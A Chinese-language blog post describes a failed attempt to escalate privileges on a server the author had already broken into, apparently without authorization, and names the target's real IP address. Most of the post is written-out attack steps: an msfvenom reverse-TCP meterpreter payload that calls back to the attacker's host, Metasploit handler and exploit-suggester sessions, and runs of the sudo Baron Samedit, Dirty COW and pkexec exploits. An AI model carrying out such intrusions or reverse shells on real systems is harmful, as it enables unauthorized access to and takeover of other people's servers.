失败的提权

(Updated: )
渗透实战

引文

书接上文,在顶级黑客:验证码发一下一文中,最后拿到了普通用户权限,于是决定提权试试。

话说在前面,破坏性的行动咱们是不会做的,不该碰的东西也不会去多看一眼。

正文

首先用msf生成elf文件,弹一个session回来。

1
msfvenom -p Linux/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f elf -o name.elf

msfconsole中开启监听,成功接收到弹回的session。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost  x.x.x.x
lhost => x.x.x.x
msf6 exploit(multi/handler) > set lport xxxx
lport => xxxx
msf6 exploit(multi/handler) > exploit

[-] Handler failed to bind to x.x.x.x:xxxx:-  -
[*] Started reverse TCP handler on 0.0.0.0:xxxx
[*] Sending stage (3045348 bytes) to x.x.x.x
[*] Meterpreter session 1 opened (x.x.x.x:xxxx -> x.x.x.x:xxxx) at 2023-02-15 00:34:00 +0800

接下来使用Suggester模块来搜索可提权的潜在方法

1
2
3
4
5
6
7
8
9
10
11
Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester
   
msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

经过尝试,发现了下面4个有可能的利用点。

1
2
3
4
5
6
7
8
9
[*] 206.238.123.163 - Valid modules for session 1:
============================

 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/network_manager_vpnc_username_priv_esc          Yes                      The service is running, but could not be validated.
 2   exploit/linux/local/pkexec                                          Yes                      The service is running, but could not be validated.
 3   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 4   exploit/linux/local/sudo_baron_samedit                              Yes                      The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.

接下来,尝试利用第四个,也就是 exploit/linux/local/sudo_baron_samedit, 因为我感觉它的介绍比其他几个的靠谱点。

1
2
3
4
5
6
7
8
9
10
11
12
13
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/sudo_baro
msf6 exploit(linux/local/sudo_baron_samedit) > set session 1
session => 1
msf6 exploit(linux/local/sudo_baron_samedit) > set lport xxxx
lport => xxxx
msf6 exploit(linux/local/sudo_baron_samedit) > exploit
[*] Started reverse TCP handler on x.x.x.x:xxxx
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
[*] Using automatically selected target: CentOS 7 x64 (sudo v1.8.23, libc v2.17)
[*] Writing '/tmp/GpZwKB.py' (6207 bytes) ...
[*] A successful exploit will create a new root user msf with password bhkzjcvtbcurriq
[*] Brute forcing ASLR (can take several minutes)...

接下来就是漫长的等待了,可惜的是最后失败了,后续又尝试了脏牛、pkexec,都没成功。

过程中遇到个小插曲,由于我是反弹的shell,用python开了个可以交互的shell,所以出现了下面的报错。

1
gcc: error trying to exec 'cc1': execvp: No such file or directory

经过搜索后,找到了一种解决方法。

1
export PATH=$PATH

结尾

虽然没提成权很不甘心,但是还是收手吧,别给人服务器整坏了。